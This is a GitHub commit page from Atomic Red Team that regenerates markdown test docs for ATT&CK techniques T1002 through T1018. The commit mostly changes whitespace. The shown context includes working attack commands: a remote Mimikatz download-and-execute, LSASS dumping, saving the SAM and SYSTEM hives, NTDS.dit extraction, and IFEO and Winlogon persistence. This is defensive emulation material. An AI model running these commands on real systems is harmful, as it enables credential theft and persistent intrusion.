Skip to content

Commit

Permalink
Generate docs from job=validate_atomics_generate_docs branch=master
Browse files Browse the repository at this point in the history
  • Loading branch information
CircleCI Atomic Red Team doc generator committed Aug 30, 2019
1 parent 019b63f commit 440e85a
Show file tree
Hide file tree
Showing 140 changed files with 1,177 additions and 0 deletions.
15 changes: 15 additions & 0 deletions atomics/T1002/T1002.md
Original file line number Diff line number Diff line change
Expand Up @@ -32,6 +32,9 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
#### Run it with `powershell`! ```
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
```
<br/>
<br/>
Expand All @@ -50,6 +53,9 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
#### Run it with `command_prompt`! ```
rar a -r #{output_file} #{input_file}
```



<br/>
<br/>

Expand All @@ -68,6 +74,9 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
#### Run it with `sh`! ```
zip #{output_file} #{input_files}
```
<br/>
<br/>
Expand All @@ -85,6 +94,9 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
#### Run it with `sh`! ```
gzip -f #{input_file}
```



<br/>
<br/>

Expand All @@ -103,4 +115,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
#### Run it with `sh`! ```
tar -cvzf #{output_file} #{input_file_folder}
```
<br/>
30 changes: 30 additions & 0 deletions atomics/T1003/T1003.md
Original file line number Diff line number Diff line change
Expand Up @@ -172,6 +172,9 @@ Dumps Credentials via Powershell by invoking a remote mimikatz script
#### Run it with `powershell`! ```
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
<br/>
<br/>
Expand All @@ -184,6 +187,9 @@ https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
#### Run it with `command_prompt`! ```
gsecdump -a
```



<br/>
<br/>

Expand All @@ -201,6 +207,9 @@ http://www.ampliasecurity.com/research/windows-credentials-editor/
#### Run it with `command_prompt`! ```
wce -o #{output_file}
```
<br/>
<br/>
Expand All @@ -216,6 +225,9 @@ reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
```



<br/>
<br/>

Expand All @@ -234,6 +246,9 @@ ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysin
#### Run it with `command_prompt`! ```
procdump.exe -accepteula -ma lsass.exe #{output_file}
```
<br/>
<br/>
Expand All @@ -256,6 +271,9 @@ Manager and administrative permissions.
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
<br/>
<br/>
Expand All @@ -281,6 +299,9 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
<br/>
<br/>
Expand All @@ -300,6 +321,9 @@ subsequent domain controllers without the need of network-based replication.
#### Run it with `command_prompt`! ```
ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q
```



<br/>
<br/>

Expand All @@ -317,6 +341,9 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
#### Run it with `command_prompt`! ```
vssadmin.exe create shadow /for=#{drive_letter}
```
<br/>
<br/>
Expand All @@ -341,4 +368,7 @@ copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
```



<br/>
9 changes: 9 additions & 0 deletions atomics/T1004/T1004.md
Original file line number Diff line number Diff line change
Expand Up @@ -35,6 +35,9 @@ PowerShell code to set Winlogon shell key to execute a binary at logon along wit
#### Run it with `powershell`! ```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
```
<br/>
<br/>
Expand All @@ -52,6 +55,9 @@ PowerShell code to set Winlogon userinit key to execute a binary at logon along
#### Run it with `powershell`! ```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
```



<br/>
<br/>

Expand All @@ -70,4 +76,7 @@ PowerShell code to set Winlogon Notify key to execute a notification package DLL
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
```
<br/>
3 changes: 3 additions & 0 deletions atomics/T1005/T1005.md
Original file line number Diff line number Diff line change
Expand Up @@ -26,4 +26,7 @@ This test uses `grep` to search a macOS Safari binaryCookies file for specified
cd ~/Library/Cookies
grep -q "#{search_string}" "Cookies.binarycookies"
```
<br/>
6 changes: 6 additions & 0 deletions atomics/T1007/T1007.md
Original file line number Diff line number Diff line change
Expand Up @@ -30,6 +30,9 @@ sc start #{service_name}
sc stop #{service_name}
wmic service where (displayname like "#{service_name}") get name
```
<br/>
<br/>
Expand All @@ -47,4 +50,7 @@ Enumerates started system services using net.exe and writes them to a file. This
#### Run it with `command_prompt`! ```
net.exe start >> #{output_file}
```



<br/>
3 changes: 3 additions & 0 deletions atomics/T1009/T1009.md
Original file line number Diff line number Diff line change
Expand Up @@ -23,4 +23,7 @@ Uses dd to add a zero to the binary to change the hash
#### Run it with `sh`! ```
dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
```
<br/>
3 changes: 3 additions & 0 deletions atomics/T1010/T1010.md
Original file line number Diff line number Diff line change
Expand Up @@ -27,4 +27,7 @@ Compiles and executes C# code to list main window titles associated with each pr
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
#{output_file_name}
```
<br/>
3 changes: 3 additions & 0 deletions atomics/T1012/T1012.md
Original file line number Diff line number Diff line change
Expand Up @@ -52,4 +52,7 @@ reg save HKLM\Security security.hive
reg save HKLM\System system.hive
reg save HKLM\SAM sam.hive
```
<br/>
9 changes: 9 additions & 0 deletions atomics/T1014/T1014.md
Original file line number Diff line number Diff line change
Expand Up @@ -29,6 +29,9 @@ Loadable Kernel Module based Rootkit
#### Run it with `sh`! ```
sudo insmod #{rootkit_file}
```
<br/>
<br/>
Expand All @@ -46,6 +49,9 @@ Loadable Kernel Module based Rootkit
#### Run it with `sh`! ```
sudo modprobe #{rootkit_file}
```



<br/>
<br/>

Expand All @@ -70,4 +76,7 @@ It would be wise if you only run this in a test environment
#### Run it with `command_prompt`! ```
puppetstrings #{driver_path}
```
<br/>
21 changes: 21 additions & 0 deletions atomics/T1015/T1015.md
Original file line number Diff line number Diff line change
Expand Up @@ -51,6 +51,9 @@ This allows adversaries to execute the attached process
#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
<br/>
<br/>
Expand All @@ -68,6 +71,9 @@ This allows adversaries to execute the attached process
#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```



<br/>
<br/>

Expand All @@ -85,6 +91,9 @@ This allows adversaries to execute the attached process
#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
<br/>
<br/>
Expand All @@ -102,6 +111,9 @@ This allows adversaries to execute the attached process
#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```



<br/>
<br/>

Expand All @@ -119,6 +131,9 @@ This allows adversaries to execute the attached process
#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
<br/>
<br/>
Expand All @@ -136,6 +151,9 @@ This allows adversaries to execute the attached process
#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```



<br/>
<br/>

Expand All @@ -153,4 +171,7 @@ This allows adversaries to execute the attached process
#### Run it with `command_prompt`! ```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
```
<br/>
6 changes: 6 additions & 0 deletions atomics/T1016/T1016.md
Original file line number Diff line number Diff line change
Expand Up @@ -24,6 +24,9 @@ arp -a
nbtstat -n
net config
```
<br/>
<br/>
Expand All @@ -38,4 +41,7 @@ arp -a
netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
ifconfig
```



<br/>
15 changes: 15 additions & 0 deletions atomics/T1018/T1018.md
Original file line number Diff line number Diff line change
Expand Up @@ -39,6 +39,9 @@ Identify remote systems with net.exe
net view /domain
net view
```
<br/>
<br/>
Expand All @@ -51,6 +54,9 @@ Identify remote systems via ping sweep
#### Run it with `command_prompt`! ```
for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
```



<br/>
<br/>

Expand All @@ -63,6 +69,9 @@ Identify remote systems via arp
#### Run it with `command_prompt`! ```
arp -a
```
<br/>
<br/>
Expand All @@ -75,6 +84,9 @@ Identify remote systems via arp
#### Run it with `sh`! ```
arp -a | grep -v '^?'
```



<br/>
<br/>

Expand All @@ -87,4 +99,7 @@ Identify remote systems via ping sweep
#### Run it with `sh`! ```
for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
```
<br/>
Loading

0 comments on commit 440e85a

Please sign in to comment.